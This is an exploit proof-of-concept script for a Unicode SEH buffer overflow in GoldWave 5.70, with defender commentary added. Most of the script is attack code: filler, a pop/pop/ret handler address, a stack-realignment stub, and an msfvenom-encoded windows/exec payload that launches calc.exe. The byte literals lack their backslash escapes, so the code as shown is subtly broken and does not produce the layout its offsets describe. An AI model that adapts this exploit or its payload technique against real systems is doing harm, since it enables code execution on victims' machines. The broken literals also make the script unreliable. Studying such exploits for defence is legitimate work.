# Exploit Title: GoldWave 5.70 – Buffer Overflow (SEH Unicode)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.goldwave.com/
# Version: 5.70
# Download Link: http://goldwave.com//downloads/gwave570.exe
# Tested on: Windows 10 x86

# PoC
# 1. generate crash.txt, copy contents to clipboard
# 2. open gold wave app
# 3. select File, Open URL...
# 4. paste contents from clipboard after 'http://'
# 5. select OK

# Defender notes on this proof-of-concept (the code itself is left exactly as
# published):
# - The title describes a SEH overwrite: the pasted input runs past a buffer
#   and replaces an exception-handler record. SEHOP and SafeSEH are the
#   Windows mitigations aimed at this class of overwrite, and DEP prevents a
#   stack-resident payload from executing; whether GoldWave 5.70 opted into
#   them is not shown here.
# - "Unicode" means the input is widened before it reaches the vulnerable
#   buffer (each byte followed by 0x00). That is why the author interleaves
#   one-byte filler values (0x71 / 0x75, labelled "Unicode NOP") between
#   real instructions and picks a handler address whose alternate bytes are
#   0x00 (0x004800b3).
# - 0x004800b3 is far below the usual DLL load ranges; in a 32-bit process
#   such an address typically belongs to the main executable's own image,
#   which loads at a fixed base if it carries no relocation data regardless
#   of ASLR — presumably why it was chosen. Confirm against the binary.
# - Delivery is manual (clipboard paste into File > Open URL...), so there is
#   no file-format trigger; crash.txt on disk is only a generation artifact.
# - NOTE(review): every byte literal in this listing is written as b"xNN"
#   rather than as an escape sequence. As published, each "xNN" is three
#   ASCII characters, so the file this script produces does not have the
#   layout the length arithmetic (1019, 595, 5000 - len(buf)) describes.
#   When deriving detections, use the byte values named in the author's
#   comments rather than the literals.

# Output file, binary mode. It is closed explicitly at the end of the script
# instead of through a context manager.
f = open("crash.txt", "wb")

buf = b""
# Filler up to the SEH record (author's offset: 1019 repetitions).
buf += b"x41" * 1019
# Next-SEH pointer slot, filled with the author's "Unicode NOP" value.
buf += b"x71x71" # Unicode NOP
# SEH handler slot: after Unicode widening these two bytes read as the
# little-endian DWORD 0x004800b3, which the author labels a pop/pop/ret
# gadget — the classic way to return into the attacker-controlled record.
buf += b"xB3x48" # 0x004800b3 | pop ecx, pop ebp, ret

#realigning stack
# Per the author's comments: PUSH ESP / POP EAX followed by an ADD and a SUB
# on EAX, each separated by a one-byte filler so the inserted 0x00 bytes are
# absorbed. The intent is to leave EAX pointing at the payload, matching the
# BufferRegister=EAX option named in the msfvenom comment further down.
# The exact immediates after widening are not reproduced in the comments.
buf += b"x75" # Unicode NOP
buf += b"x54" # Push ESP
buf += b"x75" # Unicode NOP
buf += b"x58" # POP EAX
buf += b"x75" # Unicode NOP
buf += b"x05xFFx10" # ADD EAX,
buf += b"x75" # Unicode NOP
buf += b"x2dxEAx10" # SUB EAX,
buf += b"x75"
# Filler between the realignment stub and the encoded payload.
buf += b"x71" * 595

#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python
# Encoded payload. Per the author's msfvenom comment, this is windows/exec
# with CMD=calc.exe (a benign calculator launch standing in for arbitrary
# code) passed through the x86/unicode_upper encoder with BufferRegister=EAX:
# the output is restricted to characters that survive Unicode widening and
# its decoder expects EAX to point at the payload, which the realignment
# stub earlier in the script sets up. Treat the whole run as opaque encoder
# output; it is not meaningful byte-for-byte without decoding.
# NOTE(review): as published the literals lack their backslash escapes, so
# these lines emit ASCII text such as "x50x50x59...", not the encoded bytes.
buf += b"x50x50x59x41x49x41x49x41x49x41x49x41x51"
buf += b"x41x54x41x58x41x5ax41x50x55x33x51x41x44"
buf += b"x41x5ax41x42x41x52x41x4cx41x59x41x49x41"
buf += b"x51x41x49x41x51x41x50x41x35x41x41x41x50"
buf += b"x41x5ax31x41x49x31x41x49x41x49x41x4ax31"
buf += b"x31x41x49x41x49x41x58x41x35x38x41x41x50"
buf += b"x41x5ax41x42x41x42x51x49x31x41x49x51x49"
buf += b"x41x49x51x49x31x31x31x31x41x49x41x4ax51"
buf += b"x49x31x41x59x41x5ax42x41x42x41x42x41x42"
buf += b"x41x42x33x30x41x50x42x39x34x34x4ax42x4b"
buf += b"x4cx59x58x35x32x4bx50x4bx50x4dx30x31x50"
buf += b"x43x59x4bx35x50x31x39x30x42x44x54x4bx50"
buf += b"x50x30x30x54x4bx42x32x4cx4cx54x4bx31x42"
buf += b"x4cx54x54x4bx34x32x4fx38x4cx4fx48x37x50"
buf += b"x4ax4fx36x50x31x4bx4fx36x4cx4fx4cx31x51"
buf += b"x43x4cx4cx42x4ex4cx4fx30x39x31x38x4fx4c"
buf += b"x4dx4dx31x59x37x4ax42x4ax52x42x32x51x47"
buf += b"x34x4bx50x52x4cx50x34x4bx30x4ax4fx4cx54"
buf += b"x4bx30x4cx4ex31x34x38x4bx33x30x48x4bx51"
buf += b"x4ax31x30x51x54x4bx50x59x4dx50x4dx31x5a"
buf += b"x33x44x4bx31x39x4cx58x39x53x4ex5ax30x49"
buf += b"x44x4bx4ex54x34x4bx4dx31x4ax36x4ex51x4b"
buf += b"x4fx36x4cx59x31x38x4fx4cx4dx4bx51x49x37"
buf += b"x4ex58x4bx30x52x55x4bx46x4cx43x43x4dx4c"
buf += b"x38x4fx4bx43x4dx4ex44x42x55x5ax44x30x58"
buf += b"x54x4bx52x38x4ex44x4bx51x59x43x31x56x34"
buf += b"x4bx4cx4cx50x4bx34x4bx50x58x4dx4cx4bx51"
buf += b"x39x43x44x4bx4dx34x44x4bx4bx51x4ax30x35"
buf += b"x39x30x44x4dx54x4dx54x31x4bx51x4bx53x31"
buf += b"x50x59x50x5ax32x31x4bx4fx49x50x31x4fx31"
buf += b"x4fx31x4ax34x4bx4ex32x4ax4bx54x4dx51x4d"
buf += b"x51x5ax4bx51x54x4dx54x45x46x52x4bx50x4d"
buf += b"x30x4bx50x32x30x33x38x4ex51x34x4bx42x4f"
buf += b"x34x47x4bx4fx49x45x57x4bx5ax50x38x35x45"
buf += b"x52x52x36x42x48x37x36x34x55x47x4dx55x4d"
buf += b"x4bx4fx4ax35x4fx4cx4cx46x33x4cx4cx4ax43"
buf += b"x50x4bx4bx39x50x33x45x4dx35x47x4bx50x47"
buf += b"x4ex33x42x52x42x4fx31x5ax4bx50x50x53x4b"
buf += b"x4fx49x45x52x43x53x31x42x4cx53x33x4ex4e"
buf += b"x32x45x34x38x53x35x4bx50x41x41"
# Pad to a fixed total of 5000 so the same amount of input is pasted on
# every attempt. If buf were already longer than 5000 this would multiply by
# a negative number and add nothing, silently leaving the length unchanged.
buf += b"x44" * (5000 - len(buf))

# Write the generated input to crash.txt and release the handle. The script
# has no other side effects: nothing is sent over the network and no process
# is launched by generation itself.
f.write(buf)
f.close()